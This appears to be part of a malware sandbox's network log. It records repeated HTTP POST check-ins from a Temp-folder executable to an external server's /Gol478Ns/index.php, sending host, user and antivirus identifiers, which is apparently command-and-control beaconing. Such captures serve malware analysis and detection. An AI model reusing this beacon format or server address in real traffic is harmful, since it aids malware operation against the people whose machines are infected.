                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:01.026819944 CET544OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:01.091001987 CET544INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    345192.168.2.35004862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:01.267354012 CET545OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:01.332395077 CET545INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    346192.168.2.35004962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:01.511260033 CET546OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:01.573685884 CET546INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    347192.168.2.35005062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:01.748836040 CET547OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:01.813494921 CET547INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    348192.168.2.35005162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:01.990272999 CET548OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:02.057045937 CET548INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    349192.168.2.35005262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:02.230699062 CET549OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:02.294034004 CET549INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    35192.168.2.34973762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:25.346204996 CET236OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:25.410954952 CET236INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    350192.168.2.35005362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:02.465552092 CET550OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:02.529279947 CET550INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    351192.168.2.35005462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:02.698713064 CET551OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:02.764348984 CET551INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    352192.168.2.35005562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:02.962291002 CET552OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:03.026889086 CET552INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    353192.168.2.35005662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:03.201021910 CET553OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:03.302412033 CET553INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    354192.168.2.35005762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:03.487998962 CET554OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:03.551975012 CET554INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    355192.168.2.35005862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:03.745857954 CET555OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:03.809408903 CET555INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    356192.168.2.35005962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:03.983890057 CET556OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:04.048372030 CET556INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    357192.168.2.35006062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:04.219259024 CET557OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:04.284405947 CET557INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    358192.168.2.35006162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:04.464646101 CET558OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:04.527714014 CET558INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    359192.168.2.35006262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:04.699485064 CET559OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:04.762595892 CET559INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    36192.168.2.34973862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:25.612828016 CET237OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:25.675921917 CET237INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    360192.168.2.35006362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:04.954076052 CET560OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:05.018045902 CET560INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    361192.168.2.35006462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:05.202732086 CET561OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:05.269459009 CET561INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
